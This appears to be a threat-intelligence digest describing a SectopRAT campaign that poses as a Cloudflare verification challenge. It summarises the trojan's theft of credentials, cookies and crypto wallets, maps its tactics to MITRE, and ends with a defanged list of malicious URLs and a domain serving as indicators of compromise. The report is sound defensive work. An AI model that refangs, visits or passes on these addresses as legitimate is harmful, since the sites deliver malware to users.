FOCUS MODE
EXTRACT IOC
Threat Research

I Am Not A Robot

Securonix
I Am Not A Robot
Recent social engineering tactics have evolved to include a variant of the SectopRAT malware, which is disguised as a Cloudflare verification challenge. This Remote Access Trojan employs extensive techniques for data exfiltration and uses various evasion methods to avoid detection. Affected: Users, Browsers, Cryptocurrency Holders

Keypoints :

  • ClickFix-style social engineering techniques are becoming more prevalent among threat groups.
  • SectopRAT is a Remote Access Trojan that has been active since early 2019.
  • The malware is capable of browser credential theft, cryptocurrency wallet harvesting, and system profiling.
  • SectopRAT can create concealed secondary desktops for remote manipulation.
  • It uses robust anti-analysis and command control security techniques.
  • The malware is typically distributed through malvertising and drive-by downloads.
  • Users are lured through deceptive websites mimicking legitimate services.
  • The malware can implement anti-debugging techniques to evade detection during analysis.
  • SectopRAT collects sensitive data, targeting system information, stored cookies, passwords, and cryptocurrency wallets.
  • The threat landscape continues to evolve, requiring modern security solutions.

MITRE Techniques :

  • Tactic: Initial Access – Procedure: Malvertising campaigns and drive-by downloads.
  • Tactic: Execution – Procedure: Use of PowerShell to execute malicious commands and download payloads.
  • Tactic: Data Collection – Procedure: Theft of system information, cookies, passwords, and crypto wallet data.
  • Tactic: Obfuscation – Procedure: Use of heavily obfuscated JavaScript and anti-debugging techniques.
  • Tactic: Credential Access – Procedure: Browser credential theft during web interactions.
  • Tactic: Remote Access – Procedure: Establishing secondary desktops for remote control.

Indicator of Compromise :

  • [URL] hXXps://forfsakencoilddxga[.]com/cloud
  • [URL] hXXps://caprofklfkzttripwith[.]com/main2.js
  • [URL] hXXps://ownlifeforyouwithme[.]com/plo
  • [URL] hXXps://serviceindustrverif[.]com
  • [Domain] serviceindustrverif[.]com

Full Story: https://www.inde.nz/blog/i-am-not-a-robot

Tags: COLLECTION, BROWSER, CLOUD, PAYLOAD, SOCIAL ENGINEERING, TOOL, INITIAL ACCESS, XDR